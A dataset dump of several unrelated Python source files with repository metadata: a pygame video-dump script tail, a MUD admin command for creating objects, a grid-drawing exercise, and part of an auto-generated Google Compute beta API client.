if __name__ == "__main__":
if len(sys.argv) != 4:
print 'Usage: dump_video <file_name> <image_pattern> <format_number>\n' + \
'\n<image_patter> should include %d in the name. ex. test_%d.bmp.' + \
'<format_number> can be: RGB= 2' + \
'\nThe resulting image will be in a bmp format'
else:
pygame.init()
dumpVideo(sys.argv[1], sys.argv[2], int(sys.argv[3]))
pygame.quit() | [
"richardwangwang@gmail.com"
] | richardwangwang@gmail.com |
8cab1b2cbf3a564aaa63881deefcd2ff4b6268de | f9609ff4f2bbea570f3cb4cd3f9fe6b3595d4145 | /commands/cmd_oload.py | 2f1222a7ec0e09ed83c5c5b47341433566adc839 | [] | no_license | VladThePaler/PythonWars-1996 | 2628bd2fb302faacc91688ad942799537c974f50 | d8fbc27d90f1deb9755c0ad0e1cf2c110f406e28 | refs/heads/master | 2023-05-08T19:51:28.586440 | 2021-05-14T04:19:17 | 2021-05-14T04:19:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,639 | py | # PythonWars copyright © 2020, 2021 by Paul Penner. All rights reserved.
# In order to use this codebase you must comply with all licenses.
#
# Original Diku Mud copyright © 1990, 1991 by Sebastian Hammer,
# Michael Seifert, Hans Henrik Stærfeldt, Tom Madsen, and Katja Nyboe.
#
# Merc Diku Mud improvements copyright © 1992, 1993 by Michael
# Chastain, Michael Quan, and Mitchell Tse.
#
# GodWars improvements copyright © 1995, 1996 by Richard Woolcock.
#
# ROM 2.4 is copyright 1993-1998 Russ Taylor. ROM has been brought to
# you by the ROM consortium: Russ Taylor (rtaylor@hypercube.org),
# Gabrielle Taylor (gtaylor@hypercube.org), and Brian Moore (zump@rom.org).
#
# Ported to Python by Davion of MudBytes.net using Miniboa
# (https://code.google.com/p/miniboa/).
#
# In order to use any part of this Merc Diku Mud, you must comply with
# both the original Diku license in 'license.doc' as well the Merc
# license in 'license.txt'. In particular, you may not remove either of
# these copyright notices.
#
# Much time and thought has gone into this software, and you are
# benefiting. We hope that you share your changes too. What goes
# around, comes around.
import game_utils
import handler_game
import instance
import interp
import merc
import object_creator
def cmd_oload(ch, argument):
argument, arg1 = game_utils.read_word(argument)
argument, arg2 = game_utils.read_word(argument)
if not arg1 or not arg1.isdigit():
ch.send("Syntax: oload <vnum> <level>.\n")
return
if not arg2:
level = ch.trust
else:
# New feature from Alander.
if not arg2.isdigit():
ch.send("Syntax: oload <vnum> <level>.\n")
return
level = int(arg2)
if level not in merc.irange(0, ch.trust):
ch.send("Limited to your trust level.\n")
return
vnum = int(arg1)
if vnum not in instance.item_templates:
ch.send("No object has that vnum.\n")
return
item = object_creator.create_item(instance.item_templates[vnum], level)
if item.flags.take:
ch.put(item)
handler_game.act("$p appears in $n's hands!", ch, item, None, merc.TO_ROOM)
else:
ch.in_room.put(item)
handler_game.act("$n has created $p!", ch, item, None, merc.TO_ROOM)
handler_game.act("You create $p.", ch, item, None, merc.TO_CHAR)
item.questmaker = ch.name
interp.register_command(
interp.CmdType(
name="oload",
cmd_fun=cmd_oload,
position=merc.POS_DEAD, level=7,
log=merc.LOG_ALWAYS, show=True,
default_arg=""
)
)
| [
"jindrak@gmail.com"
] | jindrak@gmail.com |
80a8724e780c5057018d2ad75baf284d200906cc | 880d9cc2704f7de649ad4455dd7ec2806b6a9e95 | /PythonExam/北京理工大学Python语言程序设计-Book/Chapter5/5.1BigTianZiGe.py | 89436192a9459828aca260e6b959b29642934e28 | [] | no_license | shunz/Python-100-Days_Practice | 14795757effcff50a4644f57c5c109fa1c9c38ac | 82f508ff6911ce3aa5c5a69cd481a6cc87f02258 | refs/heads/master | 2020-12-26T18:52:32.755384 | 2020-04-07T15:49:36 | 2020-04-07T15:49:36 | 237,604,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 320 | py | """绘制大田字格"""
def draw(n):
line = 3 * n + 1 # 一共要绘制的行数
for i in range(1, line+1):
if i % 3 == 1: # 判断需要绘制哪种线
print(n * '+----', end='')
print('+')
else:
print(n * '| ', end='')
print('|')
draw(5)
| [
"rockucn@gmail.com"
] | rockucn@gmail.com |
1705daef78acf0b2a37a8a70b47312495be0b73b | d488f052805a87b5c4b124ca93494bc9b78620f7 | /google-cloud-sdk/lib/googlecloudsdk/third_party/apis/compute/beta/compute_beta_client.py | 98445ba3fc9917a7ef289fbc86f3014cb7e7bd42 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | PacktPublishing/DevOps-Fundamentals | 5ce1fc938db66b420691aa8106ecfb3f9ceb1ace | 60597e831e08325c7e51e8557591917f7c417275 | refs/heads/master | 2023-02-02T04:48:15.346907 | 2023-01-30T08:33:35 | 2023-01-30T08:33:35 | 131,293,311 | 13 | 19 | null | null | null | null | UTF-8 | Python | false | false | 470,456 | py | """Generated client library for compute version beta."""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.py import base_api
from googlecloudsdk.third_party.apis.compute.beta import compute_beta_messages as messages
class ComputeBeta(base_api.BaseApiClient):
"""Generated client library for service compute version beta."""
MESSAGES_MODULE = messages
BASE_URL = u'https://www.googleapis.com/compute/beta/'
_PACKAGE = u'compute'
_SCOPES = [u'https://www.googleapis.com/auth/cloud-platform', u'https://www.googleapis.com/auth/compute', u'https://www.googleapis.com/auth/compute.readonly', u'https://www.googleapis.com/auth/devstorage.full_control', u'https://www.googleapis.com/auth/devstorage.read_only', u'https://www.googleapis.com/auth/devstorage.read_write']
_VERSION = u'beta'
_CLIENT_ID = '1042881264118.apps.googleusercontent.com'
_CLIENT_SECRET = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_USER_AGENT = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_CLIENT_CLASS_NAME = u'ComputeBeta'
_URL_VERSION = u'beta'
_API_KEY = None
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None, response_encoding=None):
"""Create a new compute handle."""
url = url or self.BASE_URL
super(ComputeBeta, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers,
response_encoding=response_encoding)
self.acceleratorTypes = self.AcceleratorTypesService(self)
self.addresses = self.AddressesService(self)
self.autoscalers = self.AutoscalersService(self)
self.backendBuckets = self.BackendBucketsService(self)
self.backendServices = self.BackendServicesService(self)
self.diskTypes = self.DiskTypesService(self)
self.disks = self.DisksService(self)
self.firewalls = self.FirewallsService(self)
self.forwardingRules = self.ForwardingRulesService(self)
self.globalAddresses = self.GlobalAddressesService(self)
self.globalForwardingRules = self.GlobalForwardingRulesService(self)
self.globalOperations = self.GlobalOperationsService(self)
self.healthChecks = self.HealthChecksService(self)
self.httpHealthChecks = self.HttpHealthChecksService(self)
self.httpsHealthChecks = self.HttpsHealthChecksService(self)
self.images = self.ImagesService(self)
self.instanceGroupManagers = self.InstanceGroupManagersService(self)
self.instanceGroups = self.InstanceGroupsService(self)
self.instanceTemplates = self.InstanceTemplatesService(self)
self.instances = self.InstancesService(self)
self.interconnectAttachments = self.InterconnectAttachmentsService(self)
self.interconnectLocations = self.InterconnectLocationsService(self)
self.interconnects = self.InterconnectsService(self)
self.licenseCodes = self.LicenseCodesService(self)
self.licenses = self.LicensesService(self)
self.machineTypes = self.MachineTypesService(self)
self.networks = self.NetworksService(self)
self.projects = self.ProjectsService(self)
self.regionAutoscalers = self.RegionAutoscalersService(self)
self.regionBackendServices = self.RegionBackendServicesService(self)
self.regionCommitments = self.RegionCommitmentsService(self)
self.regionDiskTypes = self.RegionDiskTypesService(self)
self.regionDisks = self.RegionDisksService(self)
self.regionInstanceGroupManagers = self.RegionInstanceGroupManagersService(self)
self.regionInstanceGroups = self.RegionInstanceGroupsService(self)
self.regionOperations = self.RegionOperationsService(self)
self.regions = self.RegionsService(self)
self.routers = self.RoutersService(self)
self.routes = self.RoutesService(self)
self.securityPolicies = self.SecurityPoliciesService(self)
self.snapshots = self.SnapshotsService(self)
self.sslCertificates = self.SslCertificatesService(self)
self.sslPolicies = self.SslPoliciesService(self)
self.subnetworks = self.SubnetworksService(self)
self.targetHttpProxies = self.TargetHttpProxiesService(self)
self.targetHttpsProxies = self.TargetHttpsProxiesService(self)
self.targetInstances = self.TargetInstancesService(self)
self.targetPools = self.TargetPoolsService(self)
self.targetSslProxies = self.TargetSslProxiesService(self)
self.targetTcpProxies = self.TargetTcpProxiesService(self)
self.targetVpnGateways = self.TargetVpnGatewaysService(self)
self.urlMaps = self.UrlMapsService(self)
self.vpnTunnels = self.VpnTunnelsService(self)
self.zoneOperations = self.ZoneOperationsService(self)
self.zones = self.ZonesService(self)
class AcceleratorTypesService(base_api.BaseApiService):
"""Service class for the acceleratorTypes resource."""
_NAME = u'acceleratorTypes'
def __init__(self, client):
super(ComputeBeta.AcceleratorTypesService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of accelerator types.
Args:
request: (ComputeAcceleratorTypesAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(AcceleratorTypeAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.acceleratorTypes.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/acceleratorTypes',
request_field='',
request_type_name=u'ComputeAcceleratorTypesAggregatedListRequest',
response_type_name=u'AcceleratorTypeAggregatedList',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified accelerator type. Get a list of available accelerator types by making a list() request.
Args:
request: (ComputeAcceleratorTypesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(AcceleratorType) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.acceleratorTypes.get',
ordered_params=[u'project', u'zone', u'acceleratorType'],
path_params=[u'acceleratorType', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/acceleratorTypes/{acceleratorType}',
request_field='',
request_type_name=u'ComputeAcceleratorTypesGetRequest',
response_type_name=u'AcceleratorType',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of accelerator types available to the specified project.
Args:
request: (ComputeAcceleratorTypesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(AcceleratorTypeList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.acceleratorTypes.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/acceleratorTypes',
request_field='',
request_type_name=u'ComputeAcceleratorTypesListRequest',
response_type_name=u'AcceleratorTypeList',
supports_download=False,
)
class AddressesService(base_api.BaseApiService):
"""Service class for the addresses resource."""
_NAME = u'addresses'
def __init__(self, client):
super(ComputeBeta.AddressesService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of addresses.
Args:
request: (ComputeAddressesAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(AddressAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.addresses.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/addresses',
request_field='',
request_type_name=u'ComputeAddressesAggregatedListRequest',
response_type_name=u'AddressAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified address resource.
Args:
request: (ComputeAddressesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.addresses.delete',
ordered_params=[u'project', u'region', u'address'],
path_params=[u'address', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/addresses/{address}',
request_field='',
request_type_name=u'ComputeAddressesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified address resource.
Args:
request: (ComputeAddressesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Address) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.addresses.get',
ordered_params=[u'project', u'region', u'address'],
path_params=[u'address', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/addresses/{address}',
request_field='',
request_type_name=u'ComputeAddressesGetRequest',
response_type_name=u'Address',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates an address resource in the specified project using the data included in the request.
Args:
request: (ComputeAddressesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.addresses.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/addresses',
request_field=u'address',
request_type_name=u'ComputeAddressesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of addresses contained within the specified region.
Args:
request: (ComputeAddressesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(AddressList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.addresses.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/addresses',
request_field='',
request_type_name=u'ComputeAddressesListRequest',
response_type_name=u'AddressList',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets the labels on an Address. To learn more about labels, read the Labeling Resources documentation.
Args:
request: (ComputeAddressesSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.addresses.setLabels',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/addresses/{resource}/setLabels',
request_field=u'regionSetLabelsRequest',
request_type_name=u'ComputeAddressesSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeAddressesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.addresses.testIamPermissions',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/addresses/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeAddressesTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class AutoscalersService(base_api.BaseApiService):
"""Service class for the autoscalers resource."""
_NAME = u'autoscalers'
def __init__(self, client):
super(ComputeBeta.AutoscalersService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of autoscalers.
Args:
request: (ComputeAutoscalersAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(AutoscalerAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.autoscalers.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/autoscalers',
request_field='',
request_type_name=u'ComputeAutoscalersAggregatedListRequest',
response_type_name=u'AutoscalerAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified autoscaler.
Args:
request: (ComputeAutoscalersDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.autoscalers.delete',
ordered_params=[u'project', u'zone', u'autoscaler'],
path_params=[u'autoscaler', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/autoscalers/{autoscaler}',
request_field='',
request_type_name=u'ComputeAutoscalersDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified autoscaler resource. Get a list of available autoscalers by making a list() request.
Args:
request: (ComputeAutoscalersGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Autoscaler) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.autoscalers.get',
ordered_params=[u'project', u'zone', u'autoscaler'],
path_params=[u'autoscaler', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/autoscalers/{autoscaler}',
request_field='',
request_type_name=u'ComputeAutoscalersGetRequest',
response_type_name=u'Autoscaler',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates an autoscaler in the specified project using the data included in the request.
Args:
request: (ComputeAutoscalersInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.autoscalers.insert',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/autoscalers',
request_field=u'autoscaler',
request_type_name=u'ComputeAutoscalersInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of autoscalers contained within the specified zone.
Args:
request: (ComputeAutoscalersListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(AutoscalerList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.autoscalers.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/autoscalers',
request_field='',
request_type_name=u'ComputeAutoscalersListRequest',
response_type_name=u'AutoscalerList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates an autoscaler in the specified project using the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeAutoscalersPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.autoscalers.patch',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'autoscaler', u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/autoscalers',
request_field=u'autoscalerResource',
request_type_name=u'ComputeAutoscalersPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeAutoscalersTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.autoscalers.testIamPermissions',
ordered_params=[u'project', u'zone', u'resource'],
path_params=[u'project', u'resource', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/autoscalers/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeAutoscalersTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates an autoscaler in the specified project using the data included in the request.
Args:
request: (ComputeAutoscalersUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.autoscalers.update',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'autoscaler', u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/autoscalers',
request_field=u'autoscalerResource',
request_type_name=u'ComputeAutoscalersUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class BackendBucketsService(base_api.BaseApiService):
"""Service class for the backendBuckets resource."""
_NAME = u'backendBuckets'
def __init__(self, client):
super(ComputeBeta.BackendBucketsService, self).__init__(client)
self._upload_configs = {
}
def AddSignedUrlKey(self, request, global_params=None):
"""Adds the given Signed URL Key to the backend bucket.
Args:
request: (ComputeBackendBucketsAddSignedUrlKeyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AddSignedUrlKey')
return self._RunMethod(
config, request, global_params=global_params)
AddSignedUrlKey.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.backendBuckets.addSignedUrlKey',
ordered_params=[u'project', u'backendBucket'],
path_params=[u'backendBucket', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/backendBuckets/{backendBucket}/addSignedUrlKey',
request_field=u'signedUrlKey',
request_type_name=u'ComputeBackendBucketsAddSignedUrlKeyRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified BackendBucket resource.
Args:
request: (ComputeBackendBucketsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.backendBuckets.delete',
ordered_params=[u'project', u'backendBucket'],
path_params=[u'backendBucket', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/backendBuckets/{backendBucket}',
request_field='',
request_type_name=u'ComputeBackendBucketsDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def DeleteSignedUrlKey(self, request, global_params=None):
"""Deletes the given Signed URL Key from the backend bucket.
Args:
request: (ComputeBackendBucketsDeleteSignedUrlKeyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('DeleteSignedUrlKey')
return self._RunMethod(
config, request, global_params=global_params)
DeleteSignedUrlKey.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.backendBuckets.deleteSignedUrlKey',
ordered_params=[u'project', u'backendBucket', u'keyName'],
path_params=[u'backendBucket', u'project'],
query_params=[u'keyName', u'requestId'],
relative_path=u'projects/{project}/global/backendBuckets/{backendBucket}/deleteSignedUrlKey',
request_field='',
request_type_name=u'ComputeBackendBucketsDeleteSignedUrlKeyRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified BackendBucket resource. Get a list of available backend buckets by making a list() request.
Args:
request: (ComputeBackendBucketsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendBucket) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.backendBuckets.get',
ordered_params=[u'project', u'backendBucket'],
path_params=[u'backendBucket', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/backendBuckets/{backendBucket}',
request_field='',
request_type_name=u'ComputeBackendBucketsGetRequest',
response_type_name=u'BackendBucket',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a BackendBucket resource in the specified project using the data included in the request.
Args:
request: (ComputeBackendBucketsInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.backendBuckets.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/backendBuckets',
request_field=u'backendBucket',
request_type_name=u'ComputeBackendBucketsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of BackendBucket resources available to the specified project.
Args:
request: (ComputeBackendBucketsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendBucketList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.backendBuckets.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/backendBuckets',
request_field='',
request_type_name=u'ComputeBackendBucketsListRequest',
response_type_name=u'BackendBucketList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates the specified BackendBucket resource with the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeBackendBucketsPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.backendBuckets.patch',
ordered_params=[u'project', u'backendBucket'],
path_params=[u'backendBucket', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/backendBuckets/{backendBucket}',
request_field=u'backendBucketResource',
request_type_name=u'ComputeBackendBucketsPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates the specified BackendBucket resource with the data included in the request.
Args:
request: (ComputeBackendBucketsUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.backendBuckets.update',
ordered_params=[u'project', u'backendBucket'],
path_params=[u'backendBucket', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/backendBuckets/{backendBucket}',
request_field=u'backendBucketResource',
request_type_name=u'ComputeBackendBucketsUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class BackendServicesService(base_api.BaseApiService):
"""Service class for the backendServices resource."""
_NAME = u'backendServices'
def __init__(self, client):
super(ComputeBeta.BackendServicesService, self).__init__(client)
self._upload_configs = {
}
def AddSignedUrlKey(self, request, global_params=None):
"""Adds the given Signed URL Key to the specified backend service.
Args:
request: (ComputeBackendServicesAddSignedUrlKeyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AddSignedUrlKey')
return self._RunMethod(
config, request, global_params=global_params)
AddSignedUrlKey.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.backendServices.addSignedUrlKey',
ordered_params=[u'project', u'backendService'],
path_params=[u'backendService', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/backendServices/{backendService}/addSignedUrlKey',
request_field=u'signedUrlKey',
request_type_name=u'ComputeBackendServicesAddSignedUrlKeyRequest',
response_type_name=u'Operation',
supports_download=False,
)
def AggregatedList(self, request, global_params=None):
"""Retrieves the list of all BackendService resources, regional and global, available to the specified project.
Args:
request: (ComputeBackendServicesAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendServiceAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
